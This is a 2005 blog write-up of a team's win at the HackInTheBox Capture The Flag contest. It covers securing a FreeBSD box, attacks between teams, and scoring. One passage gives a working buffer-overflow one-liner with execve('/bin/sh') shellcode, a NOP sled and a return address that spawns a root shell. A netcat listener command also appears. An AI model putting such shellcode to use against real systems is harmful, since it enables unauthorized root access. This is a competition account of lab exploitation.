Home » Blogs » xwings's blog

CaptureTheFlag , HackInTheBox 2005

Submitted by xwings
on October 1, 2005 - 6:26am

Subject : CaptureTheFlag , HackInTheBox 2005
Date : 28 & 29 September 2004
Place : Westin Hotel , Kuala Lumpur
Organizer : http://www.hackinthebox.org

em .. i wrote this in a rush .. will do some editing later.
SpoonFork's Writeup : http://mel.icious.net/ctf_writeup.html

Final Result For CtF

1st: Panda (Malaysia) 5000 Points - MY TEAM !!!!! OS , Freebsd
2nd: Duo (Malaysia) 4710 Points - Two Chinese Fellow, OS : Linux
3rd: VOOMPA (Malaysia) 4450 Points - 3 Cool Dude, OS : Not too sure

Some other team like ... by 2 teams from SIG2, group CLS ,
group CHININ etc etc .... Total of 9 Teams.

By the way.... Something really cool for this year

This years prizes are sponsored by Defenxis Sdn. Bhd. The winners of this years 
Capture The Flag will walk away with.

1st Place - Mac Mini 1.4GHz
2nd Place - iPod 20GB (5th generation)
3rd Place - iPod Shuffle (512MB)

Introduction :

The game attempts to test a security administrator’s ability to secure a complex 
system with unknown but required functionality. While this task seems rather odd, 
this is similar to a day job as a security consultant: a customer has a large dot.com site, 
they did not know what it does (the IT staff have all left), and they want it to be secure. 
And don’t turn it off, there is live traffic running on it. Th
e HITBSecConf CtF game models this situation as follows:

URL : http://conference.hackinthebox.org/hitbsecconf2005kl/index.php?cat=5

Day 1 :

Panda is our team name. Team members are myself, slash and x3142.

We've choosen Freebsd .... when we reach the place .. we saw all windows boxes.
We got a big shock .. till we find out ... our OS is running on VMware .. em ...

After we enter the game .. we discover there are few funny things in the server.

1. 3 unknown deamon is running. Which is daemon01 daemon02 and server01.
2. There is bug1 , bug2, bug3 and bug4.
3. some users with shell and wheel right.

Suspecious... we stared to remove the unknown users ..
changing the root passowrd and fixing the mysql privillages.
Turn off samba writiing right. bla bla bla ....

Look like its secure enuf... Since it is a freebsd 5.4 ...
we assume the system is strong enuf ... and we did not apply any firewall rules.
Oh ya, we did recompile the kernel.

In /home directory there are few funny folder. They are,


a. bug01
b. bug02
c. bug02
d. bug04
e. daemon01
f. daemon02
g. server01

All the programs are mark with comments from mel. So we guess it was written by mel.
We did not we can code the exploit locallly..

Until Mel mention we can code the bug in our local server. Then only we start to get busy.

x3142 with me was browsing all the codes... and disover that bug02 is the most simplest.
We work on the bug speratly. 10 min later .. i got the working exploit for bug2 in freebsd.

The code looks like ... 


(root@panda)[253] /home/bug02 # ./bug02 `ruby -e 'print 
"\x31\xc0\x50\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68" \ 
"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";print "\x90" * \ 
493;print "\x5c\xec\xbf\xbf"'` A A
# < < -- the shell

This is a lazy man code. We will write a better one during the weekend.
I guess we will be able to relese the question and the solutions asap.

After sometome finish bug02, there is a bigger proble came ... POWER FAILURE.
We got no choice and we choose to take a break.

x3142 went out and source for power supply and i choose to go and get some food.

After the power came back, X3142 told me that he got bug04. He got it working on the notebook.
He change the shellcode and the return address and .. it can't work on freebsd 5.4 ...

We told Mel we only got it working on Linux...
Mel says that .. that is enuf for ecoring. As long as we got the code running ,
it good enuf. If we able to get it runs on other platform .. another bonus points will be given.

We quickly go back to bug02. Code it on Linux .. after 30 min .. tying on my kubuntu ..
I reliase that new Kubuntu (breezy) come with Stack Protection...
I need to move to X3142's notebook and run the code on suse...
Again .. it work on Linux .. We score again.

end of day .. Our score is around 2500. The second place team (Duo) is about 2000.

Day 2.

Last night i found out there is a few problems with daemon01 and daemon02.

One of them is, we can show the memory with %p.

Clearly there is a format string bug for both daemon01 and daemon02.
But for daemon01 .. the format sting bug is not writetable.

We are trying out best to get bug03 working.
But , during the second half day.
We manage to get some tips from another team (Of of the SIG2 team) to
give us some tips on the bug03. Bug03 is a pointer bug. It is not simple to get the return address.

After that, we give the SIG a shell on our freebsd server and we get a shell from them too.
But .. during that time, both of us got a really bad DOSS attatck. It is not a network flood.
The orginizer told us .. this cannot consider as a massive Doss attatck.

Our server can't handle the doss attatck propely.
We been rebooted too many times.

Until once Duo manage to take over our leading posion by 100 points.

Then something funny happend ..
Our freebsd got hit till vmware could not take it. Then our windows server rebooted automatically.
Funny problem ... no one knows what happend.

X3142 found a way to login to CHININ box and gain root access.
He went in with slash and planted our flag there.
From there.. we gain some point and manage to gain more point.
Now, we are leading 100 points.

Untill the the last few hours, we got no choice but need to relese our finding on bug03 ,
daemon01 and daemon02. That help us to gain alot of point. At the same time..
we got back our leading position.

During the time, we got 600 more point compare to the second group.
But ourserver still got heavy attatck. We need to keep our server running.
We try our best to maintain the server. Before the game end ..
we restarted our server more than 10 times.

During the 15 mins, the is a power FAILURE ... again ..
Everyone take it as the end of the game. After 15 of wating.
We got the power back. Mel announced that the game gonna run for another 10 min. :)

At the same time mel relesed some information for server01.
The connect back port. During that time .. we just shutdown our server01 and try to
connect to other server. Before the game end ..
I belive no one manage to do the "nc -vvlp 399X9".

Finally the bell ring ... and ... WE WON THE GAME.
Our final score is 5000 point. Officially :)